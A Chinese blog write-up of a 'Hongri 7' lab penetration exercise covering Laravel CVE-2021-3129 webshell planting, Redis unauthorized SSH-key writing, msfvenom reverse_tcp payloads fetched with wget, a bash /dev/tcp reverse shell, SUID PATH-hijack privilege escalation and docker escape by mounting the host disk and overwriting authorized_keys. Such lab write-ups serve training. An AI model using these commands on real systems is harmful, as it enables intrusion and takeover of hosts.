内网攻防-红日靶机7

网络拓扑
在这里插入图片描述

  • 扫描目标端口
    在这里插入图片描述

  • 开放80、81两个站点
    在这里插入图片描述

根据81站点右下角 Laravel v8.29.0 寻找爆出的漏洞
在这里插入图片描述
利用网上公开的EXP成功写入后门并连接。利用后门尝试反弹shell,MSF接不到shell????查看主机配置,哦~,监听本地81端口,然后转发到192.168.52.20的8000端口。(要不是靶场,还真不清楚咋回事)
在这里插入图片描述
原来访问的是这个,怪不得不能将shell反弹到Kali
在这里插入图片描述

  • 回头看看开放的6379,呦~
    在这里插入图片描述

  • 写密钥

    ssh-keygen -t rsa						#生成密钥
    (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt		#将公钥信息写入1.txt#
    cat 1.txt | redis-cli -h 192.168.0.103 -x set hello						#把1.txt文件内容写入目标主机redis的缓冲中
    redis-cli -h 192.168.0.103
    config set dir /root/.ssh          		#设置redis的备份路径为/root/.ssh/
    config set dbfilename authorized_keys	#设置保存文件名为authorized_keys
    save
    
  • ssh root@192.168.0.103连接成功,查看当前IP

    在这里插入图片描述

  • MSF生成后门文件

    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=6666 -f elf -o msf.elf
    

    在这里插入图片描述

  • Python起一个HTTP服务
    在这里插入图片描述

  • 下载生成的后门wget http://192.168.0.104:9090/msf.elf MSF启动监听

    在这里插入图片描述

  • 下一步获取目标主机的网络信息

    在这里插入图片描述

  • 扫描目标网段存活了那些IP,一个没扫到。。。。。。。。多半是防火墙拦了

    在这里插入图片描述

  • 回头查看利用Laravel(CVE-2021-3129)web漏洞 写入的后门,发现当前权限过低需要提权,查看有无 通过环境变量提权的可能性

    find / -user root -perm -4000 -print 2>/dev/null
    

    在这里插入图片描述

  • 查看执行shell文件是什么情况,发现与ps命令相似

    在这里插入图片描述

  • 使用环境变量配合SUID进行提权,环境变量添加失败,网上说需要反弹shell,使用后门连接的情况下确实有问题

    在这里插入图片描述

  • 因为无法将shell直接反弹到kali,所以将shell反弹到52.10上

    nc -lvp 1234	#利用redis未授权写入密钥,然后进行SSH链接,再执行
    bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'	#通过webshell执行
    

    在这里插入图片描述

  • 再进行SUID提权

    cp /bin/bash /tmp/ps
    export PATH=/tmp:$PATH
    ./shell
    id
    

    在这里插入图片描述

  • 然后使用root权限下载后门并执行,后门就享有root权限;

  • kali有Ubuntu2的路由,但是Ubuntu2没有kali的路由,所以生成正向连接的后门,kali主动去连接Ubuntu2;

  • 由于Ubuntu1做了代理,实则拿到的webshell为Ubuntu2的,将生成的正向后门通过webshell上传到Ubuntu2
    在这里插入图片描述
    在这里插入图片描述

  • MSF启动监听;webshell执行后门

  • 发现接收不到shell
    在这里插入图片描述

  • 通过webshell查看根目录,发现.dockerenv文件,判断当前处于docker环境
    在这里插入图片描述

  • docker逃逸 - -Ubuntu1生成公钥

    ssh-keygen -f hello		#生成名为hello的公钥文件
    chmod 600 hello
    ls
    cat hello.pub			#将内容复制
    

    在这里插入图片描述

  • docker逃逸

    fdisk -l     		#查看磁盘文件
    ls /dev      		#查看设备文件
    cd /
    mkdir haha			
    mount /dev/sda1 /haha	#将/dev/sda1挂在到/haha目录里
    ls /haha
    

    挂载成功
    在这里插入图片描述

  • docker逃逸 - - 密钥覆盖

    cp -avx /haha/home/ubuntu/.ssh/id_rsa.pub /haha/home/ubuntu/.ssh/authorized_keys	#-avx将权限也一起复制
    echo > /haha/home/ubuntu/.ssh/authorized_keys
    echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClid+sVn9qavo22Vh1HcHV3i6MclKedlVO1O8jTsFIQbuSJYbcmw6JjB++Twwzz0j0HRFP39ztUtc8DE0Ji+0Fb4opWORynE1TLSI767LOhY9BqFfufGKZEN3qXRZhKLiY67WykEtkSUWvxXXRwHEZneC1cgslPXYx9hdbf5lqwWDJM6+PBFQJ4uyN/BZkLDs7307sBYO90+GAPYeBGBnSkjxLKyr6DNP6eXmfRBB83Y+3F4fJE4gD7kNspvUEl4GyWcg0JrmBusMZb4Iz+0CvtjD1ln7eLhT4hat/7zWn1hoW2FXnvT4bJ1y7GCLczq5lbAsf5AADeOB+o9JEwyc5 root@ubuntu' > /haha/home/ubuntu/.ssh/authorized_keys	#将ssh秘钥写入authorized_keys文件
    
    ssh -i haha ubuntu@192.168.52.20		#使用Ubuntu1的shell连接
    

    在这里插入图片描述

  • 连接成功之后,执行后门文件,如果执行MSF后门文件报错’Segmentation fault (core dumped)'👇,说明机器内存不够用了(淦,这个问题折磨了我3小时23分钟)。后门是重新生成的,端口改为了6789,
    在这里插入图片描述

  • 关闭一些后台以后,再执行后门文件就可以了
    在这里插入图片描述

  • 梅开二度
    在这里插入图片描述

  • Ubuntu1、Ubuntu2已经拿到了,就是没能把第二层网络里的win7扫出来
    先到这吧,第一次捣鼓内网,思路乱,技术菜,请大佬指教

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值